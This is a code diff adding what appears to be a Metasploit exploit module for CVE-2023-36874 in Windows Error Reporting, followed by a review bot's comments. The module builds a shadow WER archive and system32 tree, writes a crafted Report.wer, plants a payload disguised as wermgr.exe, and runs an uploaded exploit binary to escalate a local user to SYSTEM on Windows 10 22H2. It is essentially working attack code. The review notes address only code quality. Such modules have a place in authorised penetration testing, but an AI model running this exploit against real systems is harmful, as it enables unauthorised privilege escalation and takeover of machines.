+ OptString.new('SHADOW_DRIVE',
+ [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
+ OptInt.new('EXECUTE_DELAY',
+ [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+ ])
+ end
+
+ def upload_error_report
+ wer_archive_dir = get_env('PROGRAMDATA')
+ vprint_status(wer_archive_dir)
+ wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'
+ report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"
+ report_filename = "#{report_dir}\\Report.wer"
+ vprint_status("Creating #{report_dir}")
+ mkdir(report_dir)
+ wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+ vprint_status("Writing Report to #{report_filename}")
+ write_file(report_filename, wer_report_data)
+ end
+
+ def build_shadow_archive_dir(shadow_base_dir)
+ wer_archive_dir = shadow_base_dir
+ mkdir(wer_archive_dir)
+ wer_archive_dir << '\\ProgramData\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'Microsoft\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'Windows\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'WER\\'
+ mkdir(wer_archive_dir)
+ wer_archive_dir << 'ReportArchive\\'
+ mkdir(wer_archive_dir)
+ report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"
+ mkdir(report_dir)
+ return report_dir
+ end
+
+ def upload_shadow_report(shadow_archive_dir)
+ report_filename = "#{shadow_archive_dir}\\Report.wer"
+ wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')
+ vprint_status("Writing bad Report to #{report_filename}")
+ write_file(report_filename, wer_report_data)
+ end
+
+ def build_shadow_system32(shadow_base_dir)
+ shadow_win32 = "#{shadow_base_dir}\\system32"
+ vprint_status("Creating #{shadow_win32}")
+ mkdir(shadow_win32)
+ return shadow_win32
+ end
+
+ def upload_payload(shadow_win32)
+ payload_bin = generate_payload_exe
+ payload_filename = "#{shadow_win32}\\wermgr.exe"
+ vprint_status("Writing payload to #{payload_filename}")
+ write_file(payload_filename, payload_bin)
+ end
+
+ def upload_execute_exploit(exploit_path, shadow_path, home_dir)
+ vprint_status("shadow_path = #{shadow_path}")
+ exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')
+ write_file(exploit_path, exploit_bin)
+ sleep datastore['EXECUTE_DELAY']
+ vprint_status("Exploit uploaded to #{exploit_path}")
+ cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"
+ output = cmd_exec(cmd, nil, 30)
+ vprint_status(output)
+ end
+
+ def check
+ # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.
+ version = get_version_info
+ vprint_status("OS version: #{version}")
+ return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?
+ fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?
+ shadow_dir = datastore['SHADOW_DRIVE']
+ home_dir = get_env('HOMEDRIVE')
+ shadow_path = "#{home_dir}\\#{shadow_dir}"
+ vprint_status("Shadow Path = #{shadow_path}")
+ upload_error_report
+ shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)
+ upload_shadow_report(shadow_archive_dir)
+ shadow_system32 = build_shadow_system32(shadow_path.dup)
+ upload_payload(shadow_system32)
+ sleep datastore['EXECUTE_DELAY']
+ exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"
+ exploit_path << '.exe' unless exploit_path[-4..] == '.exe'
+ if shadow_dir.length > 64
+ fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')
+ end
+ upload_execute_exploit(exploit_path, shadow_dir, home_dir)
+ print_warning("Manual deletion of #{shadow_path} may be required")
+ end
+end
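Review bot: the length check in `exploit` (`if shadow_dir.length > 64` with the message `'REPORT_DIR value too long'`) runs after the report, the shadow tree and the payload have already been written, and its message names the wrong option; move it, together with an equivalent check on `REPORT_DIR` (both values end up in the exploit's 128-`WCHAR` `swprintf_s` buffers), to the top of `exploit` before any `write_file`. `Msf::Exploit::FileDropper` is included and `stdapi_fs_delete_file` is listed under `Compat`, yet nothing is ever registered for cleanup; either `register_file_for_cleanup` the two `Report.wer` copies, `wermgr.exe` and the uploaded exploit binary (and `register_dir_for_cleanup` for the shadow tree), or drop the mixin and the command so that `print_warning("Manual deletion of #{shadow_path} may be required")` is the whole story and the documentation can say so. `upload_execute_exploit(exploit_path, shadow_path, home_dir)` is called with `shadow_dir` (the bare directory name) while its parameter is named `shadow_path`, which in `exploit` means `"#{home_dir}\\#{shadow_dir}"`; rename the parameter so the two are not confused in a later edit. The `SHADOW_DRIVE` description says `%TEMP% by default` but the default is `Rex::Text.rand_text_alpha(6..14)`. Finally, `exploit_path[-4..] == '.exe'` is case-sensitive, so an `EXPLOIT_NAME` ending in `.EXE` gets a second extension appended; compare with `casecmp?`.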